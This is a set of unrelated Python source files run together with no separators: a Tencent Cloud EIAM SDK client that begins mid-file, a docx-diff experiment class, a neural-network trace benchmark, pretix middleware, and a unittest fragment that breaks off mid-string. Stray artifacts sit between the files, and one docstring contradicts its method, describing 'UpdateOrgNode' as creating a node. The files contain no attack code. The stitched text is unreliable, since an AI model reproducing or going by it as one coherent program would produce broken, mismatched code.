model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DeleteAppAccount(self, request): """删除应用账号 :param request: Request instance for DeleteAppAccount. :type request: :class:`tencentcloud.eiam.v20210420.models.DeleteAppAccountRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DeleteAppAccountResponse` """ try: params = request._serialize() body = self.call("DeleteAppAccount", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DeleteAppAccountResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DeleteOrgNode(self, request): """删除一个机构节点 :param request: Request instance for DeleteOrgNode. :type request: :class:`tencentcloud.eiam.v20210420.models.DeleteOrgNodeRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DeleteOrgNodeResponse` """ try: params = request._serialize() body = self.call("DeleteOrgNode", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DeleteOrgNodeResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DeleteUser(self, request): """通过用户名或用户 id 删除用户。 :param request: Request instance for DeleteUser. :type request: :class:`tencentcloud.eiam.v20210420.models.DeleteUserRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DeleteUserResponse` """ try: params = request._serialize() body = self.call("DeleteUser", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DeleteUserResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DeleteUserGroup(self, request): """删除一个用户组 :param request: Request instance for DeleteUserGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.DeleteUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DeleteUserGroupResponse` """ try: params = request._serialize() body = self.call("DeleteUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DeleteUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DeleteUsers(self, request): """批量删除当前节点下的用户。如果出现个别用户删除错误,将不影响其余被勾选用户被删除的操作,同时提示未被删除的用户名称/用户ID。 :param request: Request instance for DeleteUsers. :type request: :class:`tencentcloud.eiam.v20210420.models.DeleteUsersRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DeleteUsersResponse` """ try: params = request._serialize() body = self.call("DeleteUsers", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DeleteUsersResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeAccountGroup(self, request): """查询账号组列表 :param request: Request instance for DescribeAccountGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeAccountGroupResponse` """ try: params = request._serialize() body = self.call("DescribeAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeAccountGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeAppAccount(self, request): """查询应用账号列表 :param request: Request instance for DescribeAppAccount. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeAppAccountRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeAppAccountResponse` """ try: params = request._serialize() body = self.call("DescribeAppAccount", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeAppAccountResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeApplication(self, request): """获取一个应用的信息。 :param request: Request instance for DescribeApplication. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeApplicationRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeApplicationResponse` """ try: params = request._serialize() body = self.call("DescribeApplication", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeApplicationResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeOrgNode(self, request): """根据机构节点ID读取机构节点信息 :param request: Request instance for DescribeOrgNode. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeOrgNodeRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeOrgNodeResponse` """ try: params = request._serialize() body = self.call("DescribeOrgNode", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeOrgNodeResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeOrgResourcesAuthorization(self, request): """查询指定机构下的资源授权列表 :param request: Request instance for DescribeOrgResourcesAuthorization. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeOrgResourcesAuthorizationRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeOrgResourcesAuthorizationResponse` """ try: params = request._serialize() body = self.call("DescribeOrgResourcesAuthorization", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeOrgResourcesAuthorizationResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribePublicKey(self, request): """获取JWT公钥信息。 :param request: Request instance for DescribePublicKey. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribePublicKeyRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribePublicKeyResponse` """ try: params = request._serialize() body = self.call("DescribePublicKey", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribePublicKeyResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeUserGroup(self, request): """获取用户组信息 :param request: Request instance for DescribeUserGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeUserGroupResponse` """ try: params = request._serialize() body = self.call("DescribeUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeUserGroupResourcesAuthorization(self, request): """查询指定用户组下的资源授权列表 :param request: Request instance for DescribeUserGroupResourcesAuthorization. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeUserGroupResourcesAuthorizationRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeUserGroupResourcesAuthorizationResponse` """ try: params = request._serialize() body = self.call("DescribeUserGroupResourcesAuthorization", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeUserGroupResourcesAuthorizationResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeUserInfo(self, request): """通过用户名或用户 id 搜索用户 :param request: Request instance for DescribeUserInfo. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeUserInfoRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeUserInfoResponse` """ try: params = request._serialize() body = self.call("DescribeUserInfo", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeUserInfoResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeUserResourcesAuthorization(self, request): """查询指定用户下的资源授权列表 :param request: Request instance for DescribeUserResourcesAuthorization. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeUserResourcesAuthorizationRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeUserResourcesAuthorizationResponse` """ try: params = request._serialize() body = self.call("DescribeUserResourcesAuthorization", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeUserResourcesAuthorizationResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeUserThirdPartyAccountInfo(self, request): """通过用户名或用户 id 获取用户的第三方账号绑定信息。 :param request: Request instance for DescribeUserThirdPartyAccountInfo. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeUserThirdPartyAccountInfoRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeUserThirdPartyAccountInfoResponse` """ try: params = request._serialize() body = self.call("DescribeUserThirdPartyAccountInfo", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeUserThirdPartyAccountInfoResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListAccountInAccountGroup(self, request): """获取账号组中的账号列表 :param request: Request instance for ListAccountInAccountGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.ListAccountInAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListAccountInAccountGroupResponse` """ try: params = request._serialize() body = self.call("ListAccountInAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListAccountInAccountGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListApplicationAuthorizations(self, request): """应用授权关系列表(含搜索条件匹配)。 :param request: Request instance for ListApplicationAuthorizations. :type request: :class:`tencentcloud.eiam.v20210420.models.ListApplicationAuthorizationsRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListApplicationAuthorizationsResponse` """ try: params = request._serialize() body = self.call("ListApplicationAuthorizations", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListApplicationAuthorizationsResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListApplications(self, request): """获取应用列表信息。 :param request: Request instance for ListApplications. :type request: :class:`tencentcloud.eiam.v20210420.models.ListApplicationsRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListApplicationsResponse` """ try: params = request._serialize() body = self.call("ListApplications", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListApplicationsResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListAuthorizedApplicationsToOrgNode(self, request): """通过机构节点ID获得被授权访问的应用列表。 :param request: Request instance for ListAuthorizedApplicationsToOrgNode. :type request: :class:`tencentcloud.eiam.v20210420.models.ListAuthorizedApplicationsToOrgNodeRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListAuthorizedApplicationsToOrgNodeResponse` """ try: params = request._serialize() body = self.call("ListAuthorizedApplicationsToOrgNode", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListAuthorizedApplicationsToOrgNodeResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListAuthorizedApplicationsToUser(self, request): """通过用户ID获得被授权访问的应用列表。 :param request: Request instance for ListAuthorizedApplicationsToUser. :type request: :class:`tencentcloud.eiam.v20210420.models.ListAuthorizedApplicationsToUserRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListAuthorizedApplicationsToUserResponse` """ try: params = request._serialize() body = self.call("ListAuthorizedApplicationsToUser", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListAuthorizedApplicationsToUserResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListAuthorizedApplicationsToUserGroup(self, request): """通过用户组ID获得被授权访问的应用列表。 :param request: Request instance for ListAuthorizedApplicationsToUserGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.ListAuthorizedApplicationsToUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListAuthorizedApplicationsToUserGroupResponse` """ try: params = request._serialize() body = self.call("ListAuthorizedApplicationsToUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListAuthorizedApplicationsToUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListUserGroups(self, request): """获取用户组列表信息(包含查询条件)。 :param request: Request instance for ListUserGroups. :type request: :class:`tencentcloud.eiam.v20210420.models.ListUserGroupsRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListUserGroupsResponse` """ try: params = request._serialize() body = self.call("ListUserGroups", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListUserGroupsResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListUserGroupsOfUser(self, request): """获取用户所在的用户组列表 :param request: Request instance for ListUserGroupsOfUser. :type request: :class:`tencentcloud.eiam.v20210420.models.ListUserGroupsOfUserRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListUserGroupsOfUserResponse` """ try: params = request._serialize() body = self.call("ListUserGroupsOfUser", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListUserGroupsOfUserResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListUsers(self, request): """获取用户列表信息。 :param request: Request instance for ListUsers. :type request: :class:`tencentcloud.eiam.v20210420.models.ListUsersRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListUsersResponse` """ try: params = request._serialize() body = self.call("ListUsers", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListUsersResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListUsersInOrgNode(self, request): """根据机构节点ID读取节点下用户 :param request: Request instance for ListUsersInOrgNode. :type request: :class:`tencentcloud.eiam.v20210420.models.ListUsersInOrgNodeRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListUsersInOrgNodeResponse` """ try: params = request._serialize() body = self.call("ListUsersInOrgNode", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListUsersInOrgNodeResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ListUsersInUserGroup(self, request): """获取用户组中的用户列表 :param request: Request instance for ListUsersInUserGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.ListUsersInUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ListUsersInUserGroupResponse` """ try: params = request._serialize() body = self.call("ListUsersInUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ListUsersInUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ModifyAccountGroup(self, request): """修改账号组 :param request: Request instance for ModifyAccountGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.ModifyAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ModifyAccountGroupResponse` """ try: params = request._serialize() body = self.call("ModifyAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ModifyAccountGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ModifyAppAccount(self, request): """修改应用账号 :param request: Request instance for ModifyAppAccount. :type request: :class:`tencentcloud.eiam.v20210420.models.ModifyAppAccountRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ModifyAppAccountResponse` """ try: params = request._serialize() body = self.call("ModifyAppAccount", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ModifyAppAccountResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ModifyApplication(self, request): """更新一个应用的信息 :param request: Request instance for ModifyApplication. :type request: :class:`tencentcloud.eiam.v20210420.models.ModifyApplicationRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ModifyApplicationResponse` """ try: params = request._serialize() body = self.call("ModifyApplication", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ModifyApplicationResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def ModifyUserInfo(self, request): """通过用户名或用户 id 冻结用户 :param request: Request instance for ModifyUserInfo. :type request: :class:`tencentcloud.eiam.v20210420.models.ModifyUserInfoRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.ModifyUserInfoResponse` """ try: params = request._serialize() body = self.call("ModifyUserInfo", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.ModifyUserInfoResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def RemoveAccountFromAccountGroup(self, request): """从账号组中移除账号 :param request: Request instance for RemoveAccountFromAccountGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.RemoveAccountFromAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.RemoveAccountFromAccountGroupResponse` """ try: params = request._serialize() body = self.call("RemoveAccountFromAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.RemoveAccountFromAccountGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def RemoveUserFromUserGroup(self, request): """从用户组中移除用户 :param request: Request instance for RemoveUserFromUserGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.RemoveUserFromUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.RemoveUserFromUserGroupResponse` """ try: params = request._serialize() body = self.call("RemoveUserFromUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.RemoveUserFromUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def UpdateOrgNode(self, request): """新建一个机构节点, :param request: Request instance for UpdateOrgNode. :type request: :class:`tencentcloud.eiam.v20210420.models.UpdateOrgNodeRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.UpdateOrgNodeResponse` """ try: params = request._serialize() body = self.call("UpdateOrgNode", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.UpdateOrgNodeResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message)# coding: utf-8 import dirdiff, filediff import logging # convenience aliases for os.path functions from pathutils import mkdir, mkpath, experiments_abs, experiments_rel from specimen import Specimen LEFT = 0 RIGHT = 1 logger = logging.getLogger(__name__) class Experiment (object): def __init__(self, left_name, right_name): self.name = "{}_{}".format(left_name, right_name) self.logger = logging.getLogger('EXP: ' + self.name) self.logger.debug("Setting up specimens") self.left = Specimen(left_name) self.logger.info("Left specimen set to {}".format(self.left)) self.right = Specimen(right_name) self.logger.info("Right specimen set to {}".format(self.right)) self.path = experiments_abs(self.name) self.logger.info("Path set to {}".format(self.path)) self.docx = (self.left.docx, self.right.docx) self.logger.debug("Docx files set to {} and {}".format(*self.docx)) self.ugly = (self.left.ugly, self.right.ugly) self.logger.debug("Ugly directories set to {} and {}".format(*self.ugly)) self.pretty = (self.left.pretty, self.right.pretty) self.logger.debug("Pretty directories set to {} and {}".format(*self.pretty)) self.uglies = (self.left.uglies, self.right.uglies) self.logger.debug("Pretty files set to {} and {}".format(*self.uglies)) self.pretties = (self.left.pretties, self.right.pretties) self.logger.debug("Pretty files set to {} and {}".format(*self.pretties)) # essential progression def extract_left(self): self.logger.debug("Extracting left specimen") self.left.extract() def extract_right(self): self.logger.debug("Extracting right specimen") self.right.extract() def prettify_left(self): self.logger.debug("Prettifying left specimen") self.left.prettify() def prettify_right(self): self.logger.debug("Prettifying right specimen") self.right.prettify() def write_diff_reports(self): mkdir(self.path) changed = self.get_changed() for f in changed: diffs = filediff.get_diff_battery(self._left(f), self._right(f)) for diff in diffs: diff.write(self.path, f) def get_common(self): common = dirdiff.get_common(self.left.pretty, self.right.pretty) self.logger.info("Got common files: {}".format(common)) return common def get_changed(self): changed = [f for f in self.get_common() if filediff.changed(self._left(f), self._right(f))] self.logger.info("Got changed files: {}".format(changed)) return changed # path aliases for convenience def _left(self, f): path = mkpath(self.left.pretty, f) self.logger.debug("Left path requested: {}".format(path)) return path def _right(self, f): path = mkpath(self.right.pretty, f) self.logger.debug("Right path requested: {}".format(path)) return path def _exp(self, f): path = mkpath(self.path, f) self.logger.debug("Exp path requested: {}".format(path)) return path 10-100 import time import timeit from functools import partial from nninst import mode from nninst.backend.tensorflow.attack.calc_per_layer_metrics import ( get_per_layer_metrics, ) from nninst.backend.tensorflow.dataset import imagenet_raw from nninst.backend.tensorflow.graph import model_fn_with_fetch_hook from nninst.backend.tensorflow.model.config import ALEXNET from nninst.backend.tensorflow.trace.common import reconstruct_trace_from_tf_v2 from nninst.dataset.envs import IMAGENET_RAW_DIR from nninst.op import Conv2dOp from nninst.trace import ( get_per_input_unstructured_trace, get_per_receptive_field_unstructured_trace, get_trace, get_type2_trace, get_type3_trace, get_type4_trace, get_type7_trace, get_unstructured_trace, ) from nninst.utils.fs import abspath from nninst.utils.numpy import arg_approx, arg_sorted_topk class MyTimer: def __init__(self): self.start = time.time() def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): end = time.time() runtime = end - self.start msg = "The block took {time} seconds to complete" print(msg.format(time=runtime)) def benchmark_trace(): rank = 1 class_id = 1 image_id = 0 threshold = 0.5 per_channel = False model_config = ALEXNET.with_model_dir("tf/alexnet/model_import") # model_config = RESNET_50 # model_config = VGG_16 mode.check(False) data_dir = IMAGENET_RAW_DIR model_dir = abspath(model_config.model_dir) create_model = lambda: model_config.network_class() graph = model_config.network_class.graph().load() model_fn = partial(model_fn_with_fetch_hook, create_model=create_model, graph=graph) # predicted_label = predict( # create_model=create_model, # input_fn=input_fn, # model_dir=model_dir, # ) # # if predicted_label != class_id: # return None conv_op_count = 0 def stop_hook(op): nonlocal conv_op_count if isinstance(op, Conv2dOp): conv_op_count += 1 if conv_op_count >= 2: return True else: return False # reconstruct_trace_from_tf( # class_id=class_id, # model_fn=model_fn, # input_fn=input_fn, # select_fn=lambda input: arg_approx(input, threshold), # model_dir=model_dir, # per_channel=per_channel, # # stop_hook=stop_hook, # ) per_layer_metrics = lambda: get_per_layer_metrics(ALEXNET, threshold=0.5) for trace_fn in [ get_trace, partial(get_type2_trace, output_threshold=per_layer_metrics()), partial(get_type3_trace, input_threshold=per_layer_metrics()), partial( get_type4_trace, output_threshold=per_layer_metrics(), input_threshold=per_layer_metrics(), ), partial(get_unstructured_trace, density=per_layer_metrics()), partial( get_per_receptive_field_unstructured_trace, output_threshold=per_layer_metrics(), ), partial( get_type7_trace, density=per_layer_metrics(), input_threshold=per_layer_metrics(), ), partial( get_per_input_unstructured_trace, output_threshold=per_layer_metrics(), input_threshold=per_layer_metrics(), ), ]: with MyTimer(): for class_id in range(1, 11): input_fn = lambda: imagenet_raw.test( data_dir, class_id, image_id, class_from_zero=model_config.class_from_zero, preprocessing_fn=model_config.preprocessing_fn, ) reconstruct_trace_from_tf_v2( model_fn=model_fn, input_fn=input_fn, trace_fn=partial( trace_fn, select_fn=lambda input: arg_approx(input, threshold), select_seed_fn=lambda output: arg_sorted_topk(output, rank)[ rank - 1 : rank ], ), model_dir=model_dir, class_id=class_id, rank=rank, ) if __name__ == "__main__": benchmark_trace() src/pretix/presale/middleware.py from django.core.urlresolvers import resolve from django.http import HttpResponseNotFound from pretix.base.models import Event class EventMiddleware: def process_request(self, request): url = resolve(request.path_info) url_namespace = url.namespace url_name = url.url_name if url_namespace != 'presale': return if 'event.' in url_name and 'event' in url.kwargs: try: request.event = Event.objects.current.filter( slug=url.kwargs['event'], organizer__slug=url.kwargs['organizer'], ).select_related('organizer')[0] except IndexError: return HttpResponseNotFound() # TODO: Provide error message import subprocess import unittest EXPECTED_OUTPUT = """Lisa: $-93 